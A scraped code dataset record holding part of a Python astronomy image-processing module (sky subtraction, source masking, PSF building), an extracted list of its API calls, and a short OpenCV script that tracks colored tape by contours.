nrow, ncol = self.data.shape
if units == 'pixel':
x = ncol
y = nrow
else:
x = ncol * self.pixel_scales[0].to(units).value
y = nrow * self.pixel_scales[1].to(units).value
return (x, y)
def get_data_info(self):
'''
Data information to generate model image.
Returns
-------
d : dict
shape : (ny, nx)
Image array shape.
pixel_scale : (pixelscale_x, pixelscale_y), default units: arcsec
Pixel scales.
wcs_rotation : angle, default units: radian
WCS rotation, east of north.
'''
d = dict(shape=self.data.shape,
pixel_scale=self.pixel_scale,
wcs_rotation=self.wcs_rotation)
return d
def sigma_clipped_stats(self, **kwargs):
'''
Run astropy.stats.sigma_clipped_stats to get the basic statistics of
the image.
Parameters
----------
All of the parameters go to astropy.stats.sigma_clipped_stats().
Returns
-------
mean, median, stddev : float
The mean, median, and standard deviation of the sigma-clipped data.
'''
return sigma_clipped_stats(self.data.data, mask=self.data.mask, **kwargs)
def plot(self, stretch='asinh', units='arcsec', vmin=None, vmax=None,
a=None, ax=None, plain=False, **kwargs):
'''
Plot an image.
Parameters
----------
stretch : string (default: 'asinh')
Choice of stretch: asinh, linear, sqrt, log.
units : string (default: 'arcsec')
Units of pixel scale.
vmin (optional) : float
Minimal value of imshow.
vmax (optional) : float
Maximal value of imshow.
a (optional) : float
Scale factor of some stretch function.
ax (optional) : matplotlib.Axis
Axis to plot the image.
plain : bool (default: False)
If False, tune the image.
**kwargs : Additional parameters goes into plt.imshow()
Returns
-------
ax : matplotlib.Axis
Axis to plot the image.
'''
assert self.data is not None, 'Set data first!'
ax = plot_image(self.data, self.pixel_scales, stretch=stretch,
units=units, vmin=vmin, vmax=vmax, a=a, ax=ax,
plain=plain, **kwargs)
if plain is False:
ax.set_xlabel(r'$\Delta X$ ({0})'.format(units), fontsize=24)
ax.set_ylabel(r'$\Delta Y$ ({0})'.format(units), fontsize=24)
return ax
def plot_direction(self, ax, xy=(0, 0), len_E=None, len_N=None, color='k', fontsize=20,
linewidth=2, frac_len=0.1, units='arcsec', backextend=0.05):
'''
Plot the direction arrow. Only applied to plots using WCS.
Parameters
----------
ax : Axis
Axis to plot the direction.
xy : (x, y)
Coordinate of the origin of the arrows.
length : float
Length of the arrows, units: pixel.
units: string (default: arcsec)
Units of xy.
'''
xlim = ax.get_xlim()
len_total = np.abs(xlim[1] - xlim[0])
pixelscale = self.pixel_scales[0].to('degree').value
if len_E is None:
len_E = len_total * frac_len / pixelscale
if len_N is None:
len_N = len_total * frac_len / pixelscale
wcs = self.data.wcs
header = wcs.to_header()
d_ra = len_E * pixelscale
d_dec = len_N * pixelscale
ra = [header['CRVAL1'], header['CRVAL1']+d_ra, header['CRVAL1']]
dec = [header['CRVAL2'], header['CRVAL2'], header['CRVAL2']+d_dec]
ra_pix, dec_pix = wcs.all_world2pix(ra, dec, 1)
d_arrow1 = [ra_pix[1]-ra_pix[0], dec_pix[1]-dec_pix[0]]
d_arrow2 = [ra_pix[2]-ra_pix[0], dec_pix[2]-dec_pix[0]]
l_arrow1 = np.sqrt(d_arrow1[0]**2 + d_arrow1[1]**2)
l_arrow2 = np.sqrt(d_arrow2[0]**2 + d_arrow2[1]**2)
d_arrow1 = np.array(d_arrow1) / l_arrow1 * len_E * pixelscale
d_arrow2 = np.array(d_arrow2) / l_arrow2 * len_N * pixelscale
def sign_2_align(sign):
'''
Determine the alignment of the text.
'''
if sign[0] < 0:
ha = 'right'
else:
ha = 'left'
if sign[1] < 0:
va = 'top'
else:
va = 'bottom'
return ha, va
ha1, va1 = sign_2_align(np.sign(d_arrow1))
ha2, va2 = sign_2_align(np.sign(d_arrow2))
xy_e = (xy[0] - d_arrow1[0] * backextend, xy[1] - d_arrow1[1] * backextend)
ax.annotate('E', xy=xy_e, xycoords='data', fontsize=fontsize,
xytext=(d_arrow1[0]+xy[0], d_arrow1[1]+xy[1]), color=color,
arrowprops=dict(color=color, arrowstyle="<-", lw=linewidth),
ha=ha1, va=va1)
xy_n = (xy[0] - d_arrow2[0] * backextend, xy[1] - d_arrow2[1] * backextend)
ax.annotate('N', xy=xy_n, xycoords='data', fontsize=fontsize,
xytext=(d_arrow2[0]+xy[0], d_arrow2[1]+xy[1]), color=color,
arrowprops=dict(color=color, arrowstyle="<-", lw=linewidth),
ha=ha2, va=va2)
def set_data(self, data, unit):
'''
Parameters
----------
data : 2D array
Image data.
unit : string
Unit for CCDData.
'''
self.data = CCDData(data, unit=unit)
def source_detection_individual(self, psfFWHM, nsigma=3.0, sc_key=''):
'''
Parameters
----------
psfFWHM : float
FWHM of the imaging point spread function
nsigma : float
source detection threshold
'''
data = np.array(self.data.copy())
psfFWHMpix = psfFWHM / self.pixel_scales[0].value
thresholder = detect_threshold(data, nsigma=nsigma)
sigma = psfFWHMpix * gaussian_fwhm_to_sigma
kernel = Gaussian2DKernel(sigma, x_size=5, y_size=5)
kernel.normalize()
segm = detect_sources(data, thresholder, npixels=5, filter_kernel=kernel)
props = source_properties(data, segm)
tab = Table(props.to_table())
self.sources_catalog = tab
srcPstradec = self.data.wcs.all_pix2world(tab['xcentroid'], tab['ycentroid'],1)
sc = SkyCoord(srcPstradec[0], srcPstradec[1], unit='deg')
sctab = Table([sc,np.arange(len(sc))],names=['sc','sloop_{0}'.format(sc_key)])
self.sources_skycord = sctab
def make_mask(self,sources=None,magnification=3.):
'''
make mask for the extension.
Parameters
----------
sources : a to-be masked source table (can generate from photutils source detection)
if None, will use its own source catalog
magnification : expand factor to generate mask
'''
mask=np.zeros_like(self.data, dtype=bool)
mask[np.isnan(self.data)] = True
mask[np.isinf(self.data)] = True
if sources is None:
sources = self.sources_catalog
for loop in range(len(sources)):
position = (sources['xcentroid'][loop],sources['ycentroid'][loop])
a = sources['semimajor_axis_sigma'][loop]
b = sources['semiminor_axis_sigma'][loop]
theta = sources['orientation'][loop]*180./np.pi
mask=Maskellipse(mask,position,magnification*a,(1-b/a),theta)
self.data.mask = mask
if self.ss_data is not None:
self.ss_data.mask = mask
def set_mask(self, mask):
'''
Set mask for the extension.
Parameters
----------
mask : 2D array
The mask.
'''
assert self.data.shape == mask.shape, 'Mask shape incorrect!'
self.data.mask = mask
if self.ss_data is not Nont:
self.ss_data.mask = mask
def set_pixel_scales(self, pixel_scales):
'''
Parameters
----------
pixel_scales (optional) : tuple
Pixel scales along the first and second directions, units: arcsec.
'''
self.pixel_scales = (pixel_scales[0]*u.arcsec, pixel_scales[1]*u.arcsec)
def set_zero_point(self, zp):
'''
Set magnitude zero point.
'''
self.zero_point = zp
def sky_subtraction(self, order=3 , filepath = None):
'''
Do polynomial-fitting sky subtraction
Parameters
----------
order (optional) : int
order of the polynomial
'''
data = np.array(self.data.copy())
maskplus = self.data.mask.copy()
backR=polynomialfit(data,maskplus.astype(bool),order=order)
background=backR['bkg']
self.ss_data = CCDData(data-background, unit=self.data.unit)
self.ss_data.mask = maskplus
if filepath is not None:
hdu_temp = fits.PrimaryHDU(data-background)
hdu_temp.writeto(filepath, overwrite=True)
def read_ss_image(self,filepath):
'''
read sky subtracted image from "filepath"
'''
hdu = fits.open(filepath)
self.ss_data = CCDData(hdu[0].data, unit=self.data.unit)
self.ss_data.mask = self.data.mask.copy()
def cal_sigma_image(self,filepath=None):
'''
Construct sigma map following the same procedure as Galfit (quadruture sum of sigma at each pixel from source and sky background).
Note
----------
'GAIN' keyword must be available in the image header and ADU x GAIN = electron
Parameters
----------
filepath:
Whether and where to save sigma map
'''
GAIN = self.data.header['CELL.GAIN']
if self.ss_data is None:
raise ValueError(" Please do sky subtration first !!!")
data = np.array(self.ss_data.copy())
mask = self.ss_data.mask.copy()
bkgrms = np.nanstd(data[~mask.astype(bool)])
data[~mask.astype(bool)] = 0.
sigmap = np.sqrt(data/GAIN+bkgrms**2)
self.sigma_image = sigmap
if filepath is not None:
hdu_temp = fits.PrimaryHDU(sigmap)
hdu_temp.writeto(filepath, overwrite=True)
def read_sigmap(self, filepath):
'''
read sigma image from "filepath"
'''
hdu = fits.open(filepath)
self.sigma_image = hdu[0].data
def read_PSF(self, filepath):
'''
read PSF image from "filepath"
'''
hdu = fits.open(filepath)
self.PSF = hdu[0].data
class image_atlas(object):
'''
Many images.
'''
def __init__(self, image_list=None, zp_list=None, band_list=None, psfFWHM_list=None):
'''
Parameters
----------
image_list (optional) : List
List of `image`.
zp_list (optional) : List
List of magnitude zeropoint.
band_list (optional) : List
List of band name. Check `instrument_info` for band names.
'''
if image_list is None:
self.image_list = []
else:
self.image_list = image_list
if band_list is None:
self.band_list = []
else:
self.band_list = band_list
if (zp_list is None) and (band_list is not None):
zp_list = []
for b in band_list:
zp_list.append(get_zp(b))
for loop, img in enumerate(self.image_list):
img.set_zero_point(zp_list[loop])
if psfFWHM_list is None:
self.psfFWHM_list = []
else:
self.psfFWHM_list = psfFWHM_list
self.__length = len(image_list)
self.common_catalog = None
def __getitem__(self, key):
'''
Get the image data using the filter name or number index.
'''
if type(key) is str:
idx = self.band_list.index(key)
elif type(key) is int:
idx = key
return self.image_list[idx]
def __len__(self):
'''
Get the length of the data list.
'''
return self.__length
def source_detection(self,nsigma=3.0):
'''
Do multi-band source detection
Parameters
----------
nsigma : float, or a array with same size as image_atlas
source detection threshold
'''
if type(nsigma) == float:
nsigma = nsigma * np.ones(self.__length,dtype=float)
for loop in range(self.__length):
self.image_list[loop].source_detection_individual(self.psfFWHM_list[loop],nsigma=nsigma[loop],sc_key=loop+1)
def make_common_catalog(self,CM_separation=2.5,magnification=3.0,applylist=None):
'''
Do multi-band source detection
Parameters
----------
CM_separation : float
angular separation used to do sky coordinates crossmatching, unit in deg
magnification : float, or a array with same size as image_atlas
magnification for generating mask foe each image
applylist : [list of index]
None for all images
'''
if type(magnification) == float:
magnification = magnification * np.ones(self.__length,dtype=float)
if applylist is None:
applylist = np.arange(self.__length)
cats = []
for loop in applylist:
cats.append(self.image_list[loop].sources_skycord)
comc = cross_match(cats,angular_sep = 2.5)
lencc = len(comc)
master_a = np.zeros(lencc, dtype = float)
master_b = np.zeros(lencc, dtype = float)
for loop in range(len(comc)):
a = []
b = []
for loop2 in applylist:
a.append(self.image_list[loop2].sources_catalog['semimajor_axis_sigma'][comc['sloop_{0}'.format(loop2+1)][loop]]
*magnification[loop2]*self.image_list[loop2].pixel_scales[0].value)
b.append(self.image_list[loop2].sources_catalog['semiminor_axis_sigma'][comc['sloop_{0}'.format(loop2+1)][loop]]
*magnification[loop2]*self.image_list[loop2].pixel_scales[0].value)
master_a[loop] = np.max(np.array(a))
master_b[loop] = np.max(np.array(b))
comc.add_column(Column(master_a, name = 'master_a'))
comc.add_column(Column(master_b, name = 'master_b'))
self.common_catalog = comc
def sky_subtraction(self,order=3,filepaths=None):
'''
Do multi-band sky subtration
Parameters
----------
order (optional) : int
order of the polynomial
filepaths : filepath to store the sky subtracted images
'''
if type(order) == int:
order = order * np.ones(self.__length,dtype=int)
for loop in range(self.__length):
if filepaths is None:
self.image_list[loop].sky_subtraction(order[loop])
else:
self.image_list[loop].sky_subtraction(order[loop],filepath=filepaths[loop])
def master_mask(self, magnification=3.0, applylist=None):
'''
Do multi-band source masking
Parameters
----------
magnification : float, or a array with same size as image_atlas
magnification for generating mask foe each image
applylist : [list of index]
None for all images
'''
if type(magnification) == float:
magnification = magnification * np.ones(self.__length,dtype=float)
if applylist is None:
applylist = np.arange(self.__length)
comc = self.common_catalog.copy()
commonsourcelist = []
for loop2 in applylist:
newsc = self.image_list[loop2].sources_catalog.copy()
for loop in range(len(comc)):
self.image_list[loop2].sources_catalog['semimajor_axis_sigma'][comc['sloop_{0}'.format(loop2+1)][loop]] = comc['master_a'][loop]/(magnification[loop2]*self.image_list[loop2].pixel_scales[0].value)
self.image_list[loop2].sources_catalog['semiminor_axis_sigma'][comc['sloop_{0}'.format(loop2+1)][loop]] = comc['master_b'][loop]/(magnification[loop2]*self.image_list[loop2].pixel_scales[0].value)
indexes = np.delete(np.arange(len(self.image_list[loop2].sources_catalog)), comc['sloop_{0}'.format(loop2+1)])
newsc.remove_rows(indexes)
commonsourcelist.append(newsc)
for loop2 in range(self.__length):
self.image_list[loop2].make_mask(sources=commonsourcelist[loop2],magnification=magnification[loop2])
def generate_PSFs(self, equivalent_radius=2., size = 20.,oversampling=1, plot=None, filepaths=None):
'''
Generate effective point spread fuctions (ePSFs) for each image
Parameters
----------
equivalent_radius : float, unit arcsec
radius criteria to indentify star
size : float, unit pixel
use what size box to extract stars
oversampling : int
oversample the ePSF
plot : None for not plot stars & ePSF
list like [1,2,3] to plot rgb image
filepaths : filepath to store the ePSFs
'''
stars = self.common_catalog.copy()
remolist = []
for loop in range(len(stars)):
for loop2 in range(self.__length):
a = (self.image_list[loop2].sources_catalog['equivalent_radius'][stars['sloop_{0}'.format(loop2+1)][loop]])*self.image_list[loop2].pixel_scales[0].value
if (a > equivalent_radius):
remolist.append(loop)
break
stars.remove_rows(remolist)
star_images = []
PSFs = []
for loop2 in range(self.__length):
newsc = self.image_list[loop2].sources_catalog.copy()
indexes = np.delete(np.arange(len(self.image_list[loop2].sources_catalog)), stars['sloop_{0}'.format(loop2+1)])
newsc.remove_rows(indexes)
stars_tbl = Table()
stars_tbl['x']=np.array(newsc['maxval_xpos'])
stars_tbl['y']=np.array(newsc['maxval_ypos'])
nddata = NDData(data=np.array(self.image_list[loop2].ss_data))
Tstar = extract_stars(nddata, stars_tbl, size=size)
epsf_builder = EPSFBuilder(oversampling=oversampling, maxiters=15,progress_bar=False)
epsf, fitted_stars = epsf_builder(Tstar)
self.image_list[loop2].PSF = epsf.data
if filepaths is not None:
hdu = fits.PrimaryHDU(epsf.data.astype('float32'))
After = fits.HDUList([hdu])
After.writeto(filepaths[loop2],overwrite= True)
if plot is not None:
star_images.append(Tstar)
PSFs.append(epsf.data)
if plot is not None:
tlens = len(stars)
if (((tlens//5)+1)*5-tlens) < (((tlens//4)+1)*4-tlens):
ncols = 5
nrows = (tlens//5)+1
else:
ncols = 4
nrows = (tlens//4)+1
fig, ax = plt.subplots(nrows=nrows, ncols=ncols, figsize=(3*ncols, 3*nrows),squeeze=True)
ax = ax.ravel()
for i in range(tlens):
if len(plot) > 2:
star_b = star_images[plot[0]][i].data*100./np.sum(star_images[plot[0]][i].data)
star_g = star_images[plot[1]][i].data*100./np.sum(star_images[plot[1]][i].data)
star_r = star_images[plot[2]][i].data*100./np.sum(star_images[plot[2]][i].data)
norm = simple_norm(star_b, 'log', percent=99.)
image = make_lupton_rgb(star_r, star_g, star_b, Q=10)
else:
image = star_images[plot[0]][i].data
norm = simple_norm(image, 'log', percent=99.)
ax[i].imshow(image,norm=norm ,origin='lower')
plt.show()
fig=plt.figure(figsize=(10,10))
if len(plot) > 2:
star_b = PSFs[plot[0]]*100./np.sum(PSFs[plot[0]])
star_g = PSFs[plot[1]]*100./np.sum(PSFs[plot[1]])
star_r = PSFs[plot[2]]*100./np.sum(PSFs[plot[2]])
norm = simple_norm(star_b, 'log', percent=99.)
image = make_lupton_rgb(star_r, star_g, star_b, Q=10)
else:
image = PSFs[plot[0]]
norm = simple_norm(image, 'log', percent=99.)
plt.imshow(image,norm=norm ,origin='lower')
plt.show()
| [
"numpy.sqrt",
"astropy.table.Table",
"numpy.array",
"photutils.source_properties",
"photutils.psf.extract_stars",
"astropy.io.fits.open",
"numpy.arange",
"matplotlib.pyplot.imshow",
"photutils.EPSFBuilder",
"astropy.units.degree.to",
"astropy.visualization.make_lupton_rgb",
"astropy.nddata.CCD... | [((5528, 5594), 'astropy.stats.sigma_clipped_stats', 'sigma_clipped_stats', (['self.data.data'], {'mask': 'self.data.mask'}), '(self.data.data, mask=self.data.mask, **kwargs)\n', (5547, 5594), False, 'from astropy.stats import sigma_clipped_stats\n'), ((7580, 7605), 'numpy.abs', 'np.abs', (['(xlim[1] - xlim[0])'], {}), '(xlim[1] - xlim[0])\n', (7586, 7605), True, 'import numpy as np\n'), ((8309, 8353), 'numpy.sqrt', 'np.sqrt', (['(d_arrow1[0] ** 2 + d_arrow1[1] ** 2)'], {}), '(d_arrow1[0] ** 2 + d_arrow1[1] ** 2)\n', (8316, 8353), True, 'import numpy as np\n'), ((8369, 8413), 'numpy.sqrt', 'np.sqrt', (['(d_arrow2[0] ** 2 + d_arrow2[1] ** 2)'], {}), '(d_arrow2[0] ** 2 + d_arrow2[1] ** 2)\n', (8376, 8413), True, 'import numpy as np\n'), ((9920, 9944), 'astropy.nddata.CCDData', 'CCDData', (['data'], {'unit': 'unit'}), '(data, unit=unit)\n', (9927, 9944), False, 'from astropy.nddata import CCDData\n'), ((10346, 10383), 'photutils.detect_threshold', 'detect_threshold', (['data'], {'nsigma': 'nsigma'}), '(data, nsigma=nsigma)\n', (10362, 10383), False, 'from photutils import detect_threshold\n'), ((10453, 10496), 'astropy.convolution.Gaussian2DKernel', 'Gaussian2DKernel', (['sigma'], {'x_size': '(5)', 'y_size': '(5)'}), '(sigma, x_size=5, y_size=5)\n', (10469, 10496), False, 'from astropy.convolution import Gaussian2DKernel\n'), ((10539, 10605), 'photutils.detect_sources', 'detect_sources', (['data', 'thresholder'], {'npixels': '(5)', 'filter_kernel': 'kernel'}), '(data, thresholder, npixels=5, filter_kernel=kernel)\n', (10553, 10605), False, 'from photutils import detect_sources\n'), ((10622, 10651), 'photutils.source_properties', 'source_properties', (['data', 'segm'], {}), '(data, segm)\n', (10639, 10651), False, 'from photutils import source_properties\n'), ((10826, 10878), 'astropy.coordinates.SkyCoord', 'SkyCoord', (['srcPstradec[0]', 'srcPstradec[1]'], {'unit': '"""deg"""'}), "(srcPstradec[0], srcPstradec[1], unit='deg')\n", (10834, 10878), False, 'from astropy.coordinates import SkyCoord\n'), ((11380, 11416), 'numpy.zeros_like', 'np.zeros_like', (['self.data'], {'dtype': 'bool'}), '(self.data, dtype=bool)\n', (11393, 11416), True, 'import numpy as np\n'), ((13258, 13305), 'astropy.nddata.CCDData', 'CCDData', (['(data - background)'], {'unit': 'self.data.unit'}), '(data - background, unit=self.data.unit)\n', (13265, 13305), False, 'from astropy.nddata import CCDData\n'), ((13612, 13631), 'astropy.io.fits.open', 'fits.open', (['filepath'], {}), '(filepath)\n', (13621, 13631), False, 'from astropy.io import fits\n'), ((13655, 13696), 'astropy.nddata.CCDData', 'CCDData', (['hdu[0].data'], {'unit': 'self.data.unit'}), '(hdu[0].data, unit=self.data.unit)\n', (13662, 13696), False, 'from astropy.nddata import CCDData\n'), ((14500, 14534), 'numpy.sqrt', 'np.sqrt', (['(data / GAIN + bkgrms ** 2)'], {}), '(data / GAIN + bkgrms ** 2)\n', (14507, 14534), True, 'import numpy as np\n'), ((14815, 14834), 'astropy.io.fits.open', 'fits.open', (['filepath'], {}), '(filepath)\n', (14824, 14834), False, 'from astropy.io import fits\n'), ((14986, 15005), 'astropy.io.fits.open', 'fits.open', (['filepath'], {}), '(filepath)\n', (14995, 15005), False, 'from astropy.io import fits\n'), ((18034, 18062), 'numpy.zeros', 'np.zeros', (['lencc'], {'dtype': 'float'}), '(lencc, dtype=float)\n', (18042, 18062), True, 'import numpy as np\n'), ((18084, 18112), 'numpy.zeros', 'np.zeros', (['lencc'], {'dtype': 'float'}), '(lencc, dtype=float)\n', (18092, 18112), True, 'import numpy as np\n'), ((2529, 2582), 'astropy.nddata.CCDData.read', 'CCDData.read', (['filename'], {'hdu': 'hdu', 'unit': 'unit', 'mask': 'mask'}), '(filename, hdu=hdu, unit=unit, mask=mask)\n', (2541, 2582), False, 'from astropy.nddata import CCDData\n'), ((8928, 8945), 'numpy.sign', 'np.sign', (['d_arrow1'], {}), '(d_arrow1)\n', (8935, 8945), True, 'import numpy as np\n'), ((8979, 8996), 'numpy.sign', 'np.sign', (['d_arrow2'], {}), '(d_arrow2)\n', (8986, 8996), True, 'import numpy as np\n'), ((11430, 11449), 'numpy.isnan', 'np.isnan', (['self.data'], {}), '(self.data)\n', (11438, 11449), True, 'import numpy as np\n'), ((11471, 11490), 'numpy.isinf', 'np.isinf', (['self.data'], {}), '(self.data)\n', (11479, 11490), True, 'import numpy as np\n'), ((13397, 13431), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['(data - background)'], {}), '(data - background)\n', (13412, 13431), False, 'from astropy.io import fits\n'), ((14619, 14642), 'astropy.io.fits.PrimaryHDU', 'fits.PrimaryHDU', (['sigmap'], {}), '(sigmap)\n', (14634, 14642), False, 'from astropy.io import fits\n'), ((17801, 17825), 'numpy.arange', 'np.arange', (['self.__length'], {}), '(self.__length)\n', (17810, 17825), True, 'import numpy as np\n'), ((18775, 18808), 'astropy.table.Column', 'Column', (['master_a'], {'name': '"""master_a"""'}), "(master_a, name='master_a')\n", (18781, 18808), False, 'from astropy.table import Table, Column, join, join_skycoord\n'), ((18836, 18869), 'astropy.table.Column', 'Column', (['master_b'], {'name': '"""master_b"""'}), "(master_b, name='master_b')\n", (18842, 18869), False, 'from astropy.table import Table, Column, join, join_skycoord\n'), ((20083, 20107), 'numpy.arange', 'np.arange', (['self.__length'], {}), '(self.__length)\n', (20092, 20107), True, 'import numpy as np\n'), ((22561, 22568), 'astropy.table.Table', 'Table', ([], {}), '()\n', (22566, 22568), False, 'from astropy.table import Table, Column, join, join_skycoord\n'), ((22596, 22626), 'numpy.array', 'np.array', (["newsc['maxval_xpos']"], {}), "(newsc['maxval_xpos'])\n", (22604, 22626), True, 'import numpy as np\n'), ((22654, 22684), 'numpy.array', 'np.array', (["newsc['maxval_ypos']"], {}), "(newsc['maxval_ypos'])\n", (22662, 22684), True, 'import numpy as np\n'), ((22780, 22823), 'photutils.psf.extract_stars', 'extract_stars', (['nddata', 'stars_tbl'], {'size': 'size'}), '(nddata, stars_tbl, size=size)\n', (22793, 22823), False, 'from photutils.psf import extract_stars\n'), ((22851, 22922), 'photutils.EPSFBuilder', 'EPSFBuilder', ([], {'oversampling': 'oversampling', 'maxiters': '(15)', 'progress_bar': '(False)'}), '(oversampling=oversampling, maxiters=15, progress_bar=False)\n', (22862, 22922), False, 'from photutils import EPSFBuilder\n'), ((23647, 23735), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': 'nrows', 'ncols': 'ncols', 'figsize': '(3 * ncols, 3 * nrows)', 'squeeze': '(True)'}), '(nrows=nrows, ncols=ncols, figsize=(3 * ncols, 3 * nrows),\n squeeze=True)\n', (23659, 23735), True, 'import matplotlib.pyplot as plt\n'), ((24484, 24494), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (24492, 24494), True, 'import matplotlib.pyplot as plt\n'), ((24511, 24539), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (24521, 24539), True, 'import matplotlib.pyplot as plt\n'), ((25030, 25074), 'matplotlib.pyplot.imshow', 'plt.imshow', (['image'], {'norm': 'norm', 'origin': '"""lower"""'}), "(image, norm=norm, origin='lower')\n", (25040, 25074), True, 'import matplotlib.pyplot as plt\n'), ((25086, 25096), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (25094, 25096), True, 'import matplotlib.pyplot as plt\n'), ((16920, 16955), 'numpy.ones', 'np.ones', (['self.__length'], {'dtype': 'float'}), '(self.__length, dtype=float)\n', (16927, 16955), True, 'import numpy as np\n'), ((17712, 17747), 'numpy.ones', 'np.ones', (['self.__length'], {'dtype': 'float'}), '(self.__length, dtype=float)\n', (17719, 17747), True, 'import numpy as np\n'), ((18689, 18700), 'numpy.array', 'np.array', (['a'], {}), '(a)\n', (18697, 18700), True, 'import numpy as np\n'), ((18738, 18749), 'numpy.array', 'np.array', (['b'], {}), '(b)\n', (18746, 18749), True, 'import numpy as np\n'), ((19252, 19285), 'numpy.ones', 'np.ones', (['self.__length'], {'dtype': 'int'}), '(self.__length, dtype=int)\n', (19259, 19285), True, 'import numpy as np\n'), ((19994, 20029), 'numpy.ones', 'np.ones', (['self.__length'], {'dtype': 'float'}), '(self.__length, dtype=float)\n', (20001, 20029), True, 'import numpy as np\n'), ((23155, 23174), 'astropy.io.fits.HDUList', 'fits.HDUList', (['[hdu]'], {}), '([hdu])\n', (23167, 23174), False, 'from astropy.io import fits\n'), ((24790, 24830), 'astropy.visualization.simple_norm', 'simple_norm', (['star_b', '"""log"""'], {'percent': '(99.0)'}), "(star_b, 'log', percent=99.0)\n", (24801, 24830), False, 'from astropy.visualization import simple_norm, make_lupton_rgb\n'), ((24854, 24899), 'astropy.visualization.make_lupton_rgb', 'make_lupton_rgb', (['star_r', 'star_g', 'star_b'], {'Q': '(10)'}), '(star_r, star_g, star_b, Q=10)\n', (24869, 24899), False, 'from astropy.visualization import simple_norm, make_lupton_rgb\n'), ((24979, 25018), 'astropy.visualization.simple_norm', 'simple_norm', (['image', '"""log"""'], {'percent': '(99.0)'}), "(image, 'log', percent=99.0)\n", (24990, 25018), False, 'from astropy.visualization import simple_norm, make_lupton_rgb\n'), ((2671, 2709), 'astropy.wcs.utils.proj_plane_pixel_scales', 'proj_plane_pixel_scales', (['self.data.wcs'], {}), '(self.data.wcs)\n', (2694, 2709), False, 'from astropy.wcs.utils import proj_plane_pixel_scales\n'), ((2712, 2733), 'astropy.units.degree.to', 'u.degree.to', (['"""arcsec"""'], {}), "('arcsec')\n", (2723, 2733), True, 'from astropy import units as u\n'), ((8429, 8447), 'numpy.array', 'np.array', (['d_arrow1'], {}), '(d_arrow1)\n', (8437, 8447), True, 'import numpy as np\n'), ((8499, 8517), 'numpy.array', 'np.array', (['d_arrow2'], {}), '(d_arrow2)\n', (8507, 8517), True, 'import numpy as np\n'), ((22718, 22758), 'numpy.array', 'np.array', (['self.image_list[loop2].ss_data'], {}), '(self.image_list[loop2].ss_data)\n', (22726, 22758), True, 'import numpy as np\n'), ((24151, 24191), 'astropy.visualization.simple_norm', 'simple_norm', (['star_b', '"""log"""'], {'percent': '(99.0)'}), "(star_b, 'log', percent=99.0)\n", (24162, 24191), False, 'from astropy.visualization import simple_norm, make_lupton_rgb\n'), ((24219, 24264), 'astropy.visualization.make_lupton_rgb', 'make_lupton_rgb', (['star_r', 'star_g', 'star_b'], {'Q': '(10)'}), '(star_r, star_g, star_b, Q=10)\n', (24234, 24264), False, 'from astropy.visualization import simple_norm, make_lupton_rgb\n'), ((24371, 24410), 'astropy.visualization.simple_norm', 'simple_norm', (['image', '"""log"""'], {'percent': '(99.0)'}), "(image, 'log', percent=99.0)\n", (24382, 24410), False, 'from astropy.visualization import simple_norm, make_lupton_rgb\n'), ((24613, 24634), 'numpy.sum', 'np.sum', (['PSFs[plot[0]]'], {}), '(PSFs[plot[0]])\n', (24619, 24634), True, 'import numpy as np\n'), ((24679, 24700), 'numpy.sum', 'np.sum', (['PSFs[plot[1]]'], {}), '(PSFs[plot[1]])\n', (24685, 24700), True, 'import numpy as np\n'), ((24745, 24766), 'numpy.sum', 'np.sum', (['PSFs[plot[2]]'], {}), '(PSFs[plot[2]])\n', (24751, 24766), True, 'import numpy as np\n'), ((23887, 23923), 'numpy.sum', 'np.sum', (['star_images[plot[0]][i].data'], {}), '(star_images[plot[0]][i].data)\n', (23893, 23923), True, 'import numpy as np\n'), ((23987, 24023), 'numpy.sum', 'np.sum', (['star_images[plot[1]][i].data'], {}), '(star_images[plot[1]][i].data)\n', (23993, 24023), True, 'import numpy as np\n'), ((24087, 24123), 'numpy.sum', 'np.sum', (['star_images[plot[2]][i].data'], {}), '(star_images[plot[2]][i].data)\n', (24093, 24123), True, 'import numpy as np\n')] |
import cv2
import numpy as np
class TapeTracker(object):
min_thresh = np.array( [80,0,0] )
max_thresh = np.array( [90, 255, 255] )
def __init_(self):
self.img = np.zeros((500,500))
def pipeline(self, img):
self.img = cv2.resize(img, (300,300), cv2.INTER_NEAREST)
self.img = cv2.cvtColor(self.img, cv2.COLOR_BGR2HLS)
self.mask = cv2.inRange(self.img, self.min_thresh, self.max_thresh)
kernel = np.ones((5,5), np.uint8)
#self.mask = cv2.dilate(self.mask,kernel, iterations=2)
self.cnt, self.hier = cv2.findContours(self.mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
self.ret = np.copy(self.img)
self.cnt_f = []
self.cnt = sorted(self.cnt, key=cv2.contourArea, reverse=True)[:2] # get largest contour
for cnt in self.cnt:
x,y,w,h = cv2.boundingRect(cnt)
if w < 0.6*h and cv2.contourArea(cnt) > 10:
cv2.rectangle(self.ret, (x,y), (x+w, y+h), (0,255,0), 2)
self.cnt_f.append(cnt)
M_1 = cv2.moments(self.cnt_f[0])
cx_1 = int(M_1['m10']/M_1['m00'])
cy_1 = int(M_1['m01']/M_1['m00'])
M_2 = cv2.moments(self.cnt_f[1])
cx_2 = int(M_2['m10']/M_2['m00'])
cy_2 = int(M_2['m01']/M_2['m00'])
midpoint = ((cx_1+cx_2)//2, (cy_1+cy_2)//2)
self.error = midpoint[0] - self.img.shape[0]
print(self.error)
#cy = int(M['m01']/M['m00'])
#print(cx - self.img.shape[0]//2)
#print(cx)
self.ret = cv2.drawContours(self.ret, self.cnt_f, -1, (150, 150, 255), 2)
self.ret = cv2.circle(self.ret, (cx_1, cy_1), 2, (150, 155, 255))
self.ret = cv2.circle(self.ret, (cx_2, cy_2), 2, (150, 155, 255))
self.ret = cv2.circle(self.ret, midpoint, 2, (150, 255, 255))
if __name__ == "__main__":
ct = TapeTracker()
img = cv2.imread('img/1.jpg')
ct.pipeline(img)
cv2.imshow('output', cv2.resize(cv2.cvtColor(ct.img, cv2.COLOR_HLS2BGR), (500, 500), cv2.INTER_NEAREST))
cv2.imshow('mask', cv2.resize(ct.mask, (500,500), cv2.INTER_NEAREST))
cv2.imshow('contour', cv2.resize(cv2.cvtColor(ct.ret, cv2.COLOR_HLS2BGR), (500, 500), cv2.INTER_NEAREST))
k = cv2.waitKey(0) & 0xFF
if k == 27:
cv2.destroyAllWindows()
